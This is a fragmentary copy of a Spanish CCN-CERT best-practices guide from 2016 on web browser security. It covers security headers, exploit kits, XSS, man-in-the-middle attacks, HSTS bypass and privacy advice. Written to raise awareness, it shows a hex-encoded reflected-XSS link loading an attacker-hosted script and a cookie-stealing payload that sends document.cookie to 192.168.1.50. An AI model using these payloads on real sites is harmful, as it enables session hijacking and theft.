Explora Libros electrónicos
Categorías
Explora Audiolibros
Categorías
Explora Revistas
Categorías
Explora Documentos
Categorías
Buenas Prácticas
CCN-CERT BP-06/16
Navegadores web
Noviembre de 2016
SIN CLASIFICAR
SIN CLASIFICAR
LIMITACIÓN DE RESPONSABILIDAD
El presente documento se proporciona de acuerdo con los términos en él recogidos,
rechazando expresamente cualquier tipo de garantía implícita que se pueda encontrar
relacionada. En ningún caso, el Centro Criptológico Nacional puede ser considerado
responsable del daño directo, indirecto, fortuito o extraordinario derivado de la utilización de la
información y software que se indican incluso cuando se advierta de tal posibilidad.
AVISO LEGAL
Quedan rigurosamente prohibidas, sin la autorización escrita del Centro Criptológico Nacional,
bajo las sanciones establecidas en las leyes, la reproducción parcial o total de este documento
por cualquier medio o procedimiento, comprendidos la reprografía y el tratamiento informático,
y la distribución de ejemplares del mismo mediante alquiler o préstamo públicos.
SIN CLASIFICAR
SIN CLASIFICAR
ÍNDICE
1. SOBRE CCN-CERT ................................................................................................................... 5
2. INTRODUCCIÓN ...................................................................................................................... 5
3. COMPONENTES Y TECNOLOGÍAS DE SEGURIDAD DEL NAVEGADOR ................................ 6
3.1 Cabeceras HTTP ......................................................................................................................6
3.1.1 HTTP Strict Transport Security.........................................................................................7
3.1.2 Content-Security-Policy .................................................................................................7
3.1.3 X-Content-Type-Options ...............................................................................................8
3.1.4 X-XSS-Protection ..............................................................................................................9
3.1.5 Secure / HTTPOnly flags .................................................................................................9
3.1.6 X-Frame-Options .............................................................................................................9
SIN CLASIFICAR
SIN CLASIFICAR
SIN CLASIFICAR
SIN CLASIFICAR
1. SOBRE CCN-CERT
El CCN-CERT (www.ccn-cert.cni.es) es la Capacidad de Respuesta a incidentes
de Seguridad de la Información del Centro Criptológico Nacional, CCN. Este servicio se
creó en el año 2006 como CERT Gubernamental Nacional español y sus funciones
quedan recogidas en la Ley 11/2002 reguladora del Centro Nacional de Inteligencia,
el RD 421/2004 de regulación del CCN y en el RD 3/2010, de 8 de enero, regulador del
Esquema Nacional de Seguridad, modificado por el RD 951/2015, de 23 de octubre.
2. INTRODUCCIÓN
En apenas 25 años el navegador ha pasado de interpretar lenguajes de marcas
como HTML a ser una herramienta realmente compleja que implementa multitud de
medidas de seguridad y funcionalidades que van más allá del renderizado de páginas
o la visualización de contenido multimedia.
Por otro lado, el uso de exploits para conseguir ejecutar código y hacerse con el
control, no sólo del navegador, sino del equipo al completo es otro de los métodos de
infección más utilizados actualmente.
SIN CLASIFICAR
SIN CLASIFICAR
Dado que actualmente el navegador Web está expuesto a este tipo de peligros
la presente guía tiene como objetivo, por un lado, concienciar al usuario sobre las
técnicas más utilizadas por los cibercriminales y, por otro, ofrecer un conjunto de
pautas para reducir la superficie de ataque de dichas acciones dañinas.
Nota: actualmente no hace falta recurrir a software de terceros como era necesario
años atrás para poder visualizar los datos enviados y recibidos por el navegador. Hoy
en día, los principales navegadores ya incluyen herramientas de análisis para poder
SIN CLASIFICAR
SIN CLASIFICAR
ver las comunicaciones realizadas por el navegador e incluso para hacer debugging
de lenguajes de scripting.
La política HSTS tiene como objetivo evitar diversos tipos de ataques como, por
ejemplo, SSL stripping (ver punto 4.3.1), downgrade (ver punto 4.3.3), el robo de
sesiones (ver punto 4.2.1), etc. Para ello, el servicio Web comunica mediante la
cabecera "Strict-Transport-Security" al navegador Web que únicamente debe emplear
una conexión HTTPS para comunicarse con su servicio [Ref.- 5].
Algunos navegadores como Chrome, Firefox y Safari traen precargada una lista
de dominios de confianza [Ref.- 6] con los que utilizar de forma predefinida SSL/TLS.
Cabe destacar que extensiones como HTTPS Everywhere [Ref.- 7] (véase punto
5.3) sirven de complemento perfecto a la directiva “Strict-Transport-Security” para
evitar el uso de conexiones inseguras (HTTP).
3.1.2 Content-Security-Policy
La política "Content Security" permite controlar y acotar los recursos desde los
cuales los usuarios puede cargar contenido para la página que sirve dicha directiva.
Esta política es bastante útil para reducir el riesgo de ataques XSS (véase punto 4.2).
SIN CLASIFICAR
SIN CLASIFICAR
limitar los orígenes a los que el cliente puede conectar vía XHR (XMLHttpRequest),
WebSockets, etc.
3.1.3 X-Content-Type-Options
Uno de los objetivos más importantes de esta directiva es evitar cierto tipo de
ataques [Ref.- 8] como consecuencia del "content sniffing" llevado a cabo por el
navegador.
SIN CLASIFICAR
SIN CLASIFICAR
3.1.4 X-XSS-Protection
Los flags “Secure” y “HTTPOnly” tienen como objetivo proteger las cookies de
sesión para evitar ser extraídas o reveladas por un atacante. El flag “Secure” instruye al
navegador a enviar las mismas únicamente por un canal seguro; esto es SSL/TLS. Este
flag impediría que incluso sitios Web que entregan “contenido mezclado”, es decir,
sitios que en principio operan bajo HTTPS pero que contienen enlaces a recursos vía
HTTP, puedan revelar las cookies de sesión.
Por otro lado, el flag “HTTPOnly” impide que las cookies sean accedidas
mediante código JavaScript. Como se describe en el punto 4.2.1 este tipo de ataques
es muy utilizado para obtener de forma remota las cookies de sesión de un usuario
mediante ataques XSS.
3.1.6 X-Frame-Options
Esta directiva se creó con el objetivo de evitar ataques de tipo “UI redressing”
como, por ejemplo, el conocido clickjacking. La idea de este tipo de ataques es que
el usuario haga usa serie de acciones no intencionadas (por ejemplo, ejecutar cierto
script dañino) sin que él mismo sea consciente.
Para ello suelen utilizarse iframes transparentes encima de enlaces, botones, etc.
Cuando el usuario hace clic sobre ellos realmente está ejecutando el enlace
incrustado en el iframe.
Figura 6. Clickjacking
SIN CLASIFICAR
SIN CLASIFICAR
realmente está pulsando dicho botón, el cual ejecuta el código JavaScript asociado.
Eliminando la transparencia de dicho iframe es posible ver el engaño de forma más
evidente.
Este mecanismo es el que permite, por ejemplo, que ciertas páginas puedan
hacer uso de APIs de terceros como Google, Facebook, etc.
10
SIN CLASIFICAR
SIN CLASIFICAR
Además de estos mecanismos, existen ciertas APIs que, aunque respetan SOP,
permiten la comunicación entre orígenes diferentes. Por ejemplo, el método
PostMessage (implementada en HTML5) puede ser utilizado para "hablar" por medio de
iframes entre varios orígenes.
Téngase que cuenta que también los plugins están sujetos a dichas
vulnerabilidades. Plugins como Adobe Reader, Adobe Flash, Java o Silverlight
implementan también SOP de forma independiente y bajo su propio criterio (por
ejemplo, algunas versiones de Java consideran que dos dominios diferentes que
compartan una misma IP pertenecen al mismo origen, lo cual puede ser objeto de
ciertos ataques en entornos de hosting donde diversos dominios usan la misma IP).
Algunos de los plugins más utilizados son Flash Player, Java y Silverlight. Uno de los
principales problemas de los plugins es que aumentan significativamente la exposición
a determinado tipo de ataques durante la navegación web.
11
SIN CLASIFICAR
SIN CLASIFICAR
Otros navegadores como Google Chrome han tomado otra vía diferente para
proporcionar más estabilidad, seguridad y velocidad a su navegador. Para ello, a
partir de septiembre de 2015 (versión 45), ha terminado su soporte a NPAPI (Netscape
Plugin Application Programming Interface), en la cual se apoyan plugins como Java o
Flash, al considerar dicha tecnología insegura y obsoleta.
A diferencia de los plugins, las extensiones no son más que módulos adicionales
que pueden incorporarse al navegador para añadir o eliminar alguna funcionalidad,
es decir, que existen dentro del espacio de direcciones del mismo proceso.
Otra diferencia importante respecto a los plugins es que las extensiones pueden
influir en cada página que el navegador cargue (y no únicamente en aquellas que
explícitamente lo requieran).
Pese a que los navegadores actuales suelen contar con gran variedad de
funcionalidades adicionales (filtros-antiphishing, antimalware, etc.) las extensiones son
una forma fácil de integrar funcionalidades extra de todo tipo al navegador; por
ejemplo, la extensión uMatrix permite mejorar la privacidad del navegador
permitiendo al usuario decidir qué conexiones pueden establecerse y qué tipo de
datos acepta o envía el navegador; la extensión TamperData permite visualizar y
12
SIN CLASIFICAR
SIN CLASIFICAR
4.1 Exploits
Entre todos los ataques posibles que puede sufrir un usuario a través del
navegador web la ejecución de código por medio de un exploit es, sin duda, el más
crítico. Mediante un exploit, el atacante se aprovecha de determinada vulnerabilidad
para inyectar código dañino en el equipo.
13
SIN CLASIFICAR
SIN CLASIFICAR
Nota: en marzo de este año compañías de gran renombre como New York Times, BBC
o AOL fueron víctimas de una campaña de malvertising a gran escala en donde
determinada red de anuncios fue utilizada para redirigir a los usuarios a Exploit Kits que
descargaban cierto ransomware en el equipo de las víctimas.
Es común que dichos correos contengan algún asunto de interés que genere
cierta curiosidad al usuario o bien que traten de usurpar la identidad de una
organización o usuario conocido. El objetivo final es que el usuario descargue y
ejecute un fichero dañino o bien haga clic en una URL controlada por el atacante.
Nota: para conocer en profundidad las técnicas de ingeniería social más utilizadas por
los atacantes para comprometer usuarios mediante el correo electrónico remítase a la
guía del CCN-CERT “Buenas Prácticas en correo electrónico BP-02/16” [Ref.- 14]
14
SIN CLASIFICAR
SIN CLASIFICAR
Las URL empleadas suelen ser dominios creados por los atacantes con un
nombre similar al sitio legítimo que tratan de usurpar, o bien con un nombre que no
genere desconfianza. Sin embargo, a veces pueden recurrirse a vulnerabilidades XSS
reflejadas (véase punto 4.2) de dominios legítimos para conseguir inyectar código
JavaScript en el navegador.
Para ocultar el enlace dañino del parámetro vulnerable y hacer el enlace más
creíble, el atacante puede aplicar cierta codificación al código JavaScript (por
ejemplo, convertirlo a hexadecimal) de forma que el enlace adquiera la siguiente
forma
http://www.pagina-legitima.com/profile.jsp?user=%3C%73%63%72%69%70%74%25%32%30%73%72%63%3D%68
%74%74%70%3A%2F%2F%61%74%61%63%6B%65%72%2D%64%6F%6D%61%69%6E%2E%63%6F%6D%2F%66%69%6
C%65%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
Nota: otra técnica a la que suele recurrir los atacantes es utilizar servicios de
acortadores de URL. Mediante estos servicios el atacante consigue una versión
reducida de la URL bajo un dominio distinto. De este modo es posible ocultar los
parámetros JavaScript que podrían levantar sospechas en el usuario. Por ejemplo,
utilizando el servicio Bitly, el anterior enlace con el XSS reflejado se convertiría en:
http://bit.ly/2ezrxFP.
Una vez que el navegador del usuario es controlado por el atacante mediante
alguna de las vías previamente descritas se ejecutarán una serie de comprobaciones
para obtener información de las versiones de los plugins y del propio navegador.
Los header HTTP y las propiedades DOM son también aprovechadas para
obtener información del propio navegador. Por ejemplo, aunque el user-agent es una
cabecera fácilmente falsificable no es muy común que sea modificada por los
usuarios. De este modo, si el atacante recibe un user-agent como el mostrado a
continuación puede deducir que el usuario está utilizando la versión de Iceweasel 38.5
desde de un equipo Linux 64 bits.
15
SIN CLASIFICAR
SIN CLASIFICAR
Cabe destacar que los plugins y extensiones no quedan exentos de este tipo de
técnicas gracias a la información que proporcionan ciertas APIs DOM. Por ejemplo,
navigator.plugins devuelve un array de objetos con cada uno de los plugins instalados
por el navegador. Recorriendo dicho array pueden conocerse fácilmente los plugins
disponibles.
Por medio de plataformas muy sofisticadas, conocidas como Exploit Kits (EK)
[Ref.- 15], los atacantes son capaces de automatizar gran parte del proceso descrito
anteriormente. Este tipo de plataformas de ataques son vendidas o alquiladas en
ciertos mercados underground para que puedan ser utilizadas por otros
ciberdelincuentes para sus propios intereses.
16
SIN CLASIFICAR
SIN CLASIFICAR
17
SIN CLASIFICAR
SIN CLASIFICAR
Este tipo de ataques es habitual en aplicaciones en las que existe un alto nivel de
interacción con el usuario, como foros, blogs o medios digitales. El usuario puede ser
víctima de tres tipos de ataques XSS:
18
SIN CLASIFICAR
SIN CLASIFICAR
“><script>document.location.replace(‘http://192.168.1.50/cookie.php?c=’+document.c
ookie);</script>
19
SIN CLASIFICAR
SIN CLASIFICAR
Desde este framework el atacante podrá cargar nuevos payloads, llevar a cabo
ataques Man in the Browser, utilizar el navegador del usuario como proxy, establecer
mecanismos de persistencia en el navegador (XMLHttpRequest Polling, Websockets),
etc.
20
SIN CLASIFICAR
SIN CLASIFICAR
21
SIN CLASIFICAR
SIN CLASIFICAR
para conseguir shell en dicha máquina. Es importante darse cuenta que el usuario no
necesita ni siquiera hacer clic en un enlace dañino para forzar a su navegador a
acceder a un recurso controlado por el atacante.
Nota: un atacante puede utilizar diversas técnicas para conseguir acceder al tráfico
del usuario incluso cuando éste se encuentra en un lugar remoto.
Ataques mucho más sofisticados en los que pueden verse involucrados incluso países
son también posibles mediante la modificación de rutas BGP [Ref.- 20] en routers
fronterizos. Si este tipo de ataques se combinan con el robo de certificados
procedentes de autoridades de certificación (CA) las consecuencias pueden ser
devastadoras [Ref.- 21].
Actualmente los navegadores implementan medidas como HSTS para evitar este
tipo de ataques. No obstante, HSTS puede ser evadido también bajo ciertas
condiciones tal y como se describe en el siguiente punto.
22
SIN CLASIFICAR
SIN CLASIFICAR
Como se detalló en el punto 3.1.1, la política HSTS tiene como objetivo evitar
ataques de tipo downgrade forzando al navegador a emplear una conexión HTTPS
para comunicarse con el servicio.
Uno de los problemas que presenta dicha directiva es que cuando ésta es
enviada por primera vez, como consecuencia de la primera conexión del navegador,
o bien cuando el tiempo establecido por “max-age” expira, un atacante con acceso
al medio de dicha comunicación puede eliminar la cabecera “Strict-Transport-
Security” de forma que el navegador nunca llegue a conocer las exigencias HTTPS del
servicio. Para evitar este problema, algunos navegadores como Chrome o Firefox
traen precargada una lista de dominios de confianza.
Sin embargo, existen todavía posibilidades de ataque para evadir esta medida.
En la BlackHat Asia de 2014 se presentó una evolución de la conocida herramienta
SSLtrip con el nombre SSLtrip+ o SSLtrip2 la cual implementa nuevas funcionalidades
[Ref.- 22] para evadir HSTS haciendo un downgrade de los enlaces HTTPS a HTTP y
anteponiendo determinados subdominios no válidos para los sitios objetivo.
Las librerías en las que se apoyan servicios web, correo electrónico, etc., suele ser
objeto de este tipo de ataques. Un atacante, bajo una conexión de estas
características y aprovechándose de un MitM podría inyectar determinado código
JavaScript en el navegador de la víctima para enviar múltiples peticiones a
determinado sitio web seguro para ir descifrando poco a poco el contenido cifrado.
5. RECOMENDACIONES DE SEGURIDAD
El usuario debe entender que el navegador es una herramienta muy compleja
capaz de manejar numerosas tecnologías y que, al igual que cualquier otro programa,
está sujeta a vulnerabilidades y a gran variedad de ataques. Describir la facilidad con
la que muchos de estos ataques son realizados es uno de mejores métodos para
concienciar al usuario sobre las consecuencias que puede acarrear hacer un mal uso
del navegador.
23
SIN CLASIFICAR
SIN CLASIFICAR
Por otro lado, tanto Edge (el último navegador de Microsoft incorporado en
Windows 10) como IE (Internet Explorer) reciben sus actualizaciones a través de los
updates del sistema operativo. Es fundamental, por tanto, que el usuario se asegure
que su Windows está configurado para actualizarse de forma automática
(configuración por defecto).
Por otro lado, la gestión de los plugins dependerá de cada caso en particular.
Por ejemplo, en el siguiente cuadro se resume la forma en la que Adobe Flash Player es
gestionado por cada uno de los navegadores.
A partir de la versión 11.2 Adobe Flash Player [Ref.- 23] utiliza un servicio y cierta
tarea programada para mantener el sistema actualizado (siempre y cuando el
usuario, durante la instalación, seleccione la opción por defecto).
Otro plugin que requiere gran atención es Java ya que, al igual que Flash, es uno
de los principales objetivos [Ref.- 24] de los atacantes. Es muy importante que el
usuario esté al corriente y apruebe las actualizaciones disponibles. El proceso
24
SIN CLASIFICAR
SIN CLASIFICAR
Al igual que el plugin de Flash, se recomienda no instalar Java a menos que sea
estrictamente necesario, en cuyo caso considere las recomendaciones del siguiente
punto.
Otra opción es activar bajo demanda, en función del dominio visitado, el plugin
correspondiente. La mayor parte de navegadores soportan esta funcionalidad
conocida como click-to-play. La idea es bloquear por defecto todos los plugins (o
aquellos que desee el usuario) y solicitar la ejecución de los mismos cada vez que una
página web visitada requiera alguno de ellos.
25
SIN CLASIFICAR
SIN CLASIFICAR
Ya que en ocasiones herramientas de ataque como los Exploit Kits cuentan con
0-days (exploits para vulnerabilidades desconocidas que no han sido parcheadas) es
aconsejable disponer de software adicional para mitigar los mismos. Una de las
herramientas más conocidas es EMET (Microsoft) [Ref.- 26] la cual permite aplicar
determinadas medidas de seguridad tales como DEP, ASLR, EAF, SEHOP, NPA, etc., de
forma personalizada a los procesos que se deseen para prevenir la ejecución de
código dañino.
Para fortalecer aún más la defensa contra algunos de los ataques definidos en el
punto 4.3, donde se explicaron diversos ataques MitM (Man In The Middle), se
recomienda el uso de la extensión HTTPS Everywhere [Ref.- 28]. Esta extensión surge
como un proyecto de colaboración entre "Tor Project" y la EFF (Electronic Frontier
Foundation) y su objetivo es facilitar y priorizar el uso de HTTPS en las comunicaciones
del usuario. Ya que muchos servidores web todavía ofrecen sus servicios por medio de
HTTP y HTTPS, este complemento garantiza siempre el uso del canal seguro.
26
SIN CLASIFICAR
SIN CLASIFICAR
Nota: los principales navegadores también permiten eliminar de forma global las
cookies y LocaStorage desde el menú accesible por la combinación de teclas “Ctrl-
Shift-Del”. Es posible también, en algunos de ellos, configurar que dicha información
sea eliminada automáticamente cada vez que se cierre el navegador.
Por otro lado, muchas compañías utilizan la información de sesión de los usuarios
para hacer un seguimiento de la actividad de los mismos sin su consentimiento (véase
punto 6).
Algunas extensiones de gran ayuda para gestionar fácilmente este tipo de datos
son BetterPrivacy y Self-Destructing Cookies [Ref.- 30]. Estas extensiones permiten
eliminar automáticamente las cookies (e información de sesión) cuando ya no son
requeridas.
Para cada sitio que visite el usuario se puede indicar que elimine los datos de
sesión, bien cuando se cierre el navegador/pestaña o que se mantengan persistentes.
Estas extensiones ayudarán en gran medida a luchar contra evercookies [Ref.- 31],
ETag tracking, determinados ataques CSRF que se aprovechan de sesiones
almacenadas, así como múltiples técnicas de seguimiento utilizadas por multitud de
compañías.
27
SIN CLASIFICAR
SIN CLASIFICAR
28
SIN CLASIFICAR
SIN CLASIFICAR
Del mismo modo, un atacante que tenga acceso físico a la misma sesión de un
usuario podría visualizar fácilmente en claro las credenciales almacenadas.
Únicamente necesita acceder al panel de gestión y configuración de las
credenciales.
29
SIN CLASIFICAR
SIN CLASIFICAR
forma que un atacante pueda acceder a los mismos sin que ni siquiera el propio
usuario sea consciente de dicha intrusión. Este ataque es viable si los atacantes logran
comprometer algunos de los componentes involucrados en una PKI (Public Key
Infrastructure).
Cuando un cliente accede a un sitio web bajo una conexión segura dicho
servicio envía un certificado digital al navegador del usuario para tratar de
autenticarse. Este certificado contiene múltiples campos en los que se indican el
propietario, el dominio asociado, la clave pública del mismo, una firma digital, así
como otro tipo de información relacionada con las propiedades del propio certificado
(fecha de validez, etc.).
30
SIN CLASIFICAR
SIN CLASIFICAR
31
SIN CLASIFICAR
SIN CLASIFICAR
• No debe hacerse clic en enlaces sospechosos; por ejemplo, los recibidos por
medio del correo electrónico.
6. RECOMENDACIONES DE PRIVACIDAD
Una de las técnicas más utilizadas para hacer un seguimiento del usuario es el
uso de cookies. La principal función de una cookie es llevar el control de un usuario.
Normalmente cuando un usuario se autentica con éxito contra un servicio web, éste le
asigna una cookie única que permite identificar la sesión asociada a dicho usuario.
El cliente cada vez que realiza una petición posterior a dicho servicio envía la
cookie asignada como parte de las cabeceras enviadas por el navegador. Mediante
este mecanismo el servidor web puede reconocer la legitimidad de la petición y su
relación con el usuario.
32
SIN CLASIFICAR
SIN CLASIFICAR
Habitualmente la vía de acceso utilizada para fijar este tipo de cookies es por
medio de servidores de anuncios compartidos por múltiples dominios, lo que les
permite relacionar las páginas accedidas por cada usuario.
Esto significa que los usuarios, sin necesidad de acceder directamente a los
dominios que fijan este tipo de cookies (cookies de terceros), pueden recibir las mismas
igualmente si el dominio visitado incrusta (por ejemplo, mediante un iframe) alguno de
esos sitios. Este es también el mecanismo utilizado por redes sociales tales como
Facebook, Google+, etc. La siguiente imagen muestra de forma genérica un caso
práctico de este tipo de técnicas.
Las cookies, sin embargo, no son el único recurso al que se puede recurrir [Ref.-
38] para realizar un seguimiento de los usuarios. El LocalStorage, LSO (Local Shared
Objects), evercookies, canvas fingerprinting, etc., son otras técnicas que permiten
identificar y correlar información acerca de los clientes. Gran parte de estas técnicas
se aprovechan de las funcionalidades proporcionadas por HMLT5.
Las propias características del navegador pueden ser suficientes también (sin
necesidad de cookies) para identificar de manera casi unívoca un navegador. El
33
SIN CLASIFICAR
SIN CLASIFICAR
Esta extensión permite modificar el user-agent del propio navegador por uno
generado de forma aleatoria o bien por uno predefinido. Además, proporciona otras
funcionalidades interesantes destinadas a proteger la privacidad y seguridad de la
navegación; por ejemplo: eliminar determinadas cabeceras (por ejemplo, el header
"Referer"), habilitar cabeceras como "Do Not Track" (utilizado para instruir al servidor
Web a que no realice técnicas de seguimiento del usuario) [Ref.- 40], deshabilitar
tecnologías como WebGL o WebRTC (la cual puede utilizarse para revelar información
delicada; por ejemplo, la dirección IP real detrás de una VPN), permite falsificar la
resolución del monitor (característica que también puede ser usada para identificar un
cliente), etc.
34
SIN CLASIFICAR
SIN CLASIFICAR
Por último, es importante mencionar uBlock Origin [Ref.- 44] al tratarse de una de
las mejores extensiones open-source existentes para bloquear anuncios, cookies de
terceros, así como páginas potencialmente dañinas. Esta extensión dispone de
multitud de listas negras públicas relacionadas con anuncios, privacidad, dominios de
malware, etc., además de permitir la incorporación de filtros y reglas personalizadas.
35
SIN CLASIFICAR
SIN CLASIFICAR
Nota: los usuarios técnicos pueden considerar extensiones como "NoScript Security
Suite" o "Policeman" para la generación de reglas más personalizadas basadas en tipo
de contenido.
36
SIN CLASIFICAR
SIN CLASIFICAR
37
SIN CLASIFICAR
SIN CLASIFICAR
7. DECÁLOGO DE RECOMENDACIONES
Utilícese siempre un navegador actualizado. Los principales navegadores de hoy en día se actualizan
1 automáticamente bien de forma transparente al usuario o mediante notificaciones que deberán ser
aprobadas. Las actualizaciones automáticas del sistema operativo deberán también estar habilitadas.
2 Compruébese que los plugins y extensiones están configurados para actualizarse automáticamente.
Asimismo, asegúrese que la instalación de estos complementos se realiza desde fuentes fiables.
Se aconseja deshabilitar de forma predeterminada plugins como Adobe Flash y Java. El usuario podrá
habilitar los mismos bajo demanda para aquellos servicios conocidos y que sean de confianza.
3 Mecanismos como click-to-play o el uso de determinadas extensiones permiten facilitar esta tarea.
Asimismo, se recomienda deshabilitar JavaScript para navegar por páginas web desconocidas. Para
agilizar esta configuración pueden utilizarse extensiones que permiten aplicar políticas de contenido
para habilitar y deshabilitar lenguajes de scripting.
Se aconseja revisar las opciones de seguridad y privacidad del navegador. Actualmente los
4 navegadores disponen de medidas tan interesantes como: no aceptar cookies de terceros, bloquear
pop-ups, evitar la sincronización de contraseñas, evitar el autocompletado, borrar los ficheros temporales
y cookies al cerrar el navegador, bloquear la geolocalización, filtrar ActiveX, etc.
Se recomienda hacer uso de HTTPS (SSL/TLS) frente a HTTP incluso para aquellos servicios que no manejen
5 información sensible. Algunas funcionalidades como HSTS y extensiones como HTTPS Everywhere servirán
de gran ayuda para garantizar el uso preferente de HTTPS sobre HTTP durante la navegación web.
Se recomienda proteger el navegador y los plugins con soluciones anti-exploit para mitigar posibles
ataques derivados de exploits. En algunos casos, este tipo de herramientas podrán proteger al usuario
6
frente a 0-days. Esta solución no debe verse como un sustituto al antivirus sino como una capa de
seguridad adicional.
Se recomienda no almacenar contraseñas de forma predeterminada por medio del navegador y utilizar
herramientas más seguras para dicha gestión (por ejemplo, gestores de contraseñas que implementen
7
un sistema de cifrado robusto). En el caso de que se decida utilizar el navegador es importante hacer uso
de una llave maestra que cifre el repositorio de credenciales.
Es importante verificar que los certificados remitidos por servicios HTTPS que manejen información sensible
(por ejemplo, servicios de correo, banca electrónica, etc.) han sido remitidos por una CA de confianza.
8
Cualquier error o alerta generada por el navegador como consecuencia de la validación del certificado
(por ejemplo, certificados autofirmados) deberá revisarse cuidadosamente.
Para mejorar la seguridad frente a ataques de tipo Man in the Middle se recomienda el uso de políticas
9
de "Certificate Pinning".
38
SIN CLASIFICAR
SIN CLASIFICAR
8. ANEXO A. REFERENCIAS
Pwn2Own 2016
ZerodayInitiative
[Ref – 1]
http://zerodayinitiative.com/Pwn2Own2016Rules.html
Trustwave
SpiderLabs Blog
[Ref – 2] 9 de junio de 2016
https://www.trustwave.com/Resources/SpiderLabs-Blog/Zero-Day-Auction-for-the-Masses/
W3C
Document Object Model (DOM) Technical Reports
[Ref – 3]
https://www.w3.org/DOM/DOMTR
IANA
Message Headers
[Ref – 4]
https://www.iana.org/assignments/message-headers/message-headers.xhtml
OWASP
Secure Headers Project
[Ref – 5]
https://www.owasp.org/index.php/OWASP_Secure_Headers_Project
HSTS Preload
[Ref – 6] https://hstspreload.appspot.com/
EFF
HTTPS-Everywhere
[Ref – 7]
https://www.eff.org/HTTPS-EVERYWHERE
Berkeley
Secure Content Sniffing for Web Browsers, or How to Stop Papers from Reviewing Themselves
[Ref – 8]
http://webblaze.cs.berkeley.edu/papers/barth-caballero-song.pdf
BeEF Project
Exploiting with BeEF Bind shellcode
[Ref – 9] 19 de marzo de 2014
http://blog.beefproject.com/2014/03/exploiting-with-beef-bind-shellcode_19.html
BlackHat 2016
Bypassing Browser Security Policies For Fun And Profit
[Ref – 10] https://www.blackhat.com/docs/asia-16/materials/asia-16-Baloch-Bypassing-Browser-Security-
Policies-For-Fun-And-Profit-wp.pdf
Chromium
The road to safer, more stable, and flashier Flash
[Ref – 11] 8 de agosto de 2012
https://blog.chromium.org/2012/08/the-road-to-safer-more-stable-and.html
ARStechnica
NoScript and other popular Firefox add-ons open millions to new attack
6 de abril de 2016
[Ref – 12]
http://arstechnica.com/security/2016/04/noscript-and-other-popular-firefox-add-ons-open-
millions-to-new-attack/
Cisco blog
Threat Spotlight: Angler Lurking in the Domain Shadows
[Ref – 13] 3 de Marzo de 2016
http://blogs.cisco.com/security/talos/angler-domain-shadowing#shadowing
CCN-CERT
[Ref – 14] Informe de buenas prácticas en el correo electrónico
Julio de 2016
39
SIN CLASIFICAR
SIN CLASIFICAR
https://www.ccn-cert.cni.es/informes/informes-de-buenas-practicas-bp/1598-ccn-cert-bp-02-16-
correo-electronico/file.html
TrendMicro
Exploit-kit
[Ref – 15]
http://www.trendmicro.com/vinfo/us/security/definition/exploit-kit
Github
BeefProject
[Ref – 16]
https://github.com/beefproject/beef
Rapid7
The New Metasploit Browser Autopwn: Strikes Faster and Smarter
30 de junio de 2015
[Ref – 17]
https://community.rapid7.com/community/metasploit/blog/2015/07/15/the-new-metasploit-
browser-autopwn-strikes-faster-and-smarter--part-1
Offensive Security
Kali NetHunter 3.0 Released
[Ref – 18] 6 de enero de 2016
https://www.offensive-security.com/kali-nethunter/nethunter-3-0-released/
Cert PL
Large-scale DNS redirection on home routers for financial theft
6 de febrero de 2014
[Ref – 19]
https://www.cert.pl/en/news/single/large-scale-dns-redirection-on-home-routers-for-financial-
theft/
Bishop Fox
An Overview of BGP Hijacking
[Ref – 20] 17 de agosto de 2015
https://www.bishopfox.com/blog/2015/08/an-overview-of-bgp-hijacking/
isc2 blog
Security breach in CA networks
[Ref – 21] 4 de abril de 2012
http://blog.isc2.org/isc2_blog/2012/04/test.html
Adobe
Introducing Adobe Flash Player Background Updater for Windows
[Ref – 23]
http://www.adobe.com/devnet/flashplayer/articles/background-updater-windows.html
CVE Details
Java: Security Vulnerabilities
[Ref – 24]
https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-19117/Oracle-JRE.html
HowToGeek
How to Enable Click-to-Play Plugins in Every Web Browser
[Ref – 25] 7 de noviembre de 2015
http://www.howtogeek.com/188059/how-to-enable-click-to-play-plugins-in-every-web-browser/
Microsoft
EMET
[Ref – 26]
https://support.microsoft.com/en-us/kb/2458544
MalwareBytes
Anti-Exploit
[Ref – 27]
https://es.malwarebytes.com/antiexploit/
40
SIN CLASIFICAR
SIN CLASIFICAR
EFF
HTTPS Everywhere Rulesets
[Ref – 28]
https://www.eff.org/https-everywhere/rulesets
EFF
HTTPS Everywhere Atlas
[Ref – 29]
https://www.eff.org/https-everywhere/atlas/
Mozilla
Self-Destructing Cookies
[Ref – 30]
https://addons.mozilla.org/en-US/firefox/addon/self-destructing-cookies/
Samy Kamkar
Evercookie
[Ref – 31] 11 de octubre de 2010
http://samy.pl/evercookie/
RaiderSec
How Browsers Store Your Passwords (and Why You Shouldn't Let Them)
[Ref – 32] 20 de junio de 2013
https://raidersec.blogspot.com.es/2013/06/how-browsers-store-your-passwords-and.html
Engadget
Finding passwords saved in Chrome is surprisingly easy, Google security lead sees no issue
[Ref – 33] 8 de julio de 2013
https://www.engadget.com/2013/08/07/chrome-saved-passwords/
Wired
You need a password manager
[Ref – 34] 24 de enero de 2016
https://www.wired.com/2016/01/You-need-a-password-manager/
Detectify
How I made LastPass give me all your passwords
[Ref – 35] 27 de julio de 2016
https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/
Trendmicro
DigiNotar: Iranians – The Real Target
[Ref – 36] 5 de septiembre de 2011
http://blog.trendmicro.com/trendlabs-security-intelligence/diginotar-iranians-the-real-target/
OWASP
Certificate and Public Key Pinning
[Ref – 37]
https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning
Mozilla
Random Agent Spoofer
[Ref – 39]
https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
Wikipedia
Do Not Track
[Ref – 40]
https://en.wikipedia.org/wiki/Do_Not_Track
Disconnect
Disconnect: A faster, safer Internet is one click away
[Ref – 41]
https://disconnect.me/
41
SIN CLASIFICAR
SIN CLASIFICAR
Github
Decentraleyes
[Ref – 43]
https://github.com/Synzvato/decentraleyes
Github
uBlock
[Ref – 44]
https://github.com/gorhill/uBlock/
Radical Research
HSTS Super Cookies
[Ref – 45] 2 de enero de 2015
http://www.radicalresearch.co.uk/lab/hstssupercookies
Ijcaonline
Analysis of Privacy of Private Browsing Mode through Memory Forensics
[Ref – 46] Diciembre de 2015
http://www.ijcaonline.org/research/volume132/number16/ghafarian-2015-ijca-907693.pdf
42
SIN CLASIFICAR